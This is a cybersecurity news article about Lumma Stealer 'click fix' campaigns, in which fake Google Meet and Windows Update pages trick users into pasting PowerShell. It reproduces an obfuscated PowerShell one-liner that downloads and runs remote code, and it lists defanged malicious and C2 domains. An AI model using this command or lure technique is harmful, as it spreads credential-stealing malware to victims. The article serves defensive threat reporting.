Cyber Security News

Lumma Stealer Launch “Click Fix” Style Attack via Fake Google Meet & Windows Update Sites

Recent Palo Alto research investigations have revealed the ongoing evolution of “click fix” style campaigns used to distribute the Lumma Stealer malware.

These campaigns exploit user interaction by leveraging malicious scripts that are inserted into the copy-paste buffer, tricking victims into executing harmful commands.

The “click fix” distribution method involves malicious web pages that display instructions for users to open a run window, paste a preloaded PowerShell script from their clipboard, and execute it. This deceptive technique capitalizes on user trust and often impersonates legitimate services to avoid suspicion.

Attackers are continuously refining their methods to evade detection and increase the success rate of these campaigns. Recent developments include:

  • Domain Impersonation: Registering domain names that mimic legitimate services to gain user trust (e.g., windows-update[.]site).
  • Abuse of Trusted Platforms: Hosting malicious pages on reputable platforms like Google Sites.
  • PowerShell Script Delivery: Using data binaries that combine text and binary data, enabling them to execute as PowerShell scripts.
  • DLL Side-Loading: Distributing zip archives containing decoy files and legitimate executables to side-load Lumma Stealer DLLs.

The campaigns demonstrate ongoing evolution in the attackers’ methods as they attempt to evade detection while maintaining effectiveness across multiple distribution channels.

Malicious Activity

Example 1: Fake Google Meet Page

A fake Google Meet page hosted on sites.google[.]com instructs users to run a PowerShell command that downloads and executes a script from tlgrm-redirect[.]icu. The infection process involves:

  1. Downloading a zip archive (plsverif[.]cfd/1.zip) containing Lumma Stealer files.
  2. Extracting and executing a DLL (DuiLib_u.dll) via side-loading.

Example 2: Fake Windows Update Site

The site windows-update[.]site prompts users to execute a PowerShell command that downloads a file (overcoatpassably[.]shop/Z8UZbPyVpGfdRS/maloy[.]mp4). This file contains ASCII text and binary data capable of running as a PowerShell script.

The PowerShell commands used in these campaigns are crafted to obfuscate malicious intent. For example:

powershellpowershell -w hidden -c $a='[base64 text removed]'; $b=[Convert]::FromBase64String($a);$c=[System.Text.Encoding]::UTF8.GetString($b);Invoke-Expression (Invoke-WebRequest -Uri $c).Content

This command decodes Base64 text into a malicious script, which is then executed.

Malicious traffic patterns observed during infections include:

  • HTTP POST requests to tlgrmverif[.]cyou/log.php, confirming successful execution of various stages.
  • Downloads from domains like plsverif[.]cfd and overcoatpassably[.]shop.

Active Lumma Stealer C2 Domains

Active command-and-control (C2) domains for Lumma Stealer include:

  • web-security3[.]com
  • techspherxe[.]top

Inactive C2 domains that no longer resolve include:

  • hardswarehub[.]today
  • earthsymphzony[.]today

Key files associated with these campaigns include:

  1. A PowerShell script retrieved from tlgrm-redirect[.]icu/1.txt (SHA256: 909ed8a135…).
  2. A zip archive containing Lumma Stealer files (plsverif[.]cfd/1.zip, SHA256: 0608775a345…).
  3. A DLL side-loaded by a legitimate EXE (DuiLib_u.dll, SHA256: b3e8b610ef…).

Indicators of Compromise

Active Domains Hosting Malicious Pages

  1. windows-update[.]site (registered February 19, 2025)
  2. sites[.]google[.]com/view/get-access-now-test/verify-your-account

Associated Domains

Domains linked to these campaigns include:

  • authentication-safeguard[.]com (registered January 17, 2025)
  • plsverif[.]cfd (registered March 1, 2025)
  • tlgrmverif[.]cyou (registered January 11, 2025)

The evolving tactics in these “click fix” campaigns highlight the sophistication of modern malware distribution techniques.

By abusing trusted platforms and employing advanced obfuscation methods, attackers are successfully bypassing traditional detection mechanisms.

Organizations must remain vigilant, implement robust security measures, and educate users about the risks of executing unverified scripts.

Find this Story Interesting! Follow us on Google NewsLinkedIn, and X to Get More Instant Updates

Balaji N

BALAJI is an Ex-Security Researcher (Threat Research Labs) at Comodo Cybersecurity. Editor-in-Chief & Co-Founder - Cyber Security News & GBHackers On Security.

Recent Posts

ToxNetV2 Linux Botnet Uses NVIDIA AI to Generate Shell and Remote SSH Attack Actions

ToxNetV2 is a Linux botnet that shows how artificial intelligence can move closer to real…

2 seconds ago

WhatsApp Passkeys Reach 1 Billion Users as Two-Step Verification Gets Stronger Passwords

WhatsApp has confirmed that more than 1 billion people now use passkeys to log into…

7 minutes ago

ASOS Warns Customer Accounts Were Accessed Using Compromised Login Credentials

ASOS US Sales LLC reported unauthorized access to customer accounts using credentials obtained from outside…

15 minutes ago

Eight AI Agents Breach Government Systems, Crack 85 Accounts and Steal 2,500+ Records

A near-autonomous cyberattack using open-source AI agent frameworks compromised government systems in Asia, cracked 85…

18 minutes ago

Fake Microsoft Security Scan Tells You to Remove Antivirus—Then Scammers Ask for Remote Access

A new web-based scam is using fake Microsoft-branded security scans to frighten people into removing…

19 minutes ago

AliExpress Uses WebAudio API and Zero-Gain Audio Graphs for Silent Device Fingerprinting

AliExpress's homepage quietly builds hidden WebAudio processing graphs in the browser, a technique that appears…

23 minutes ago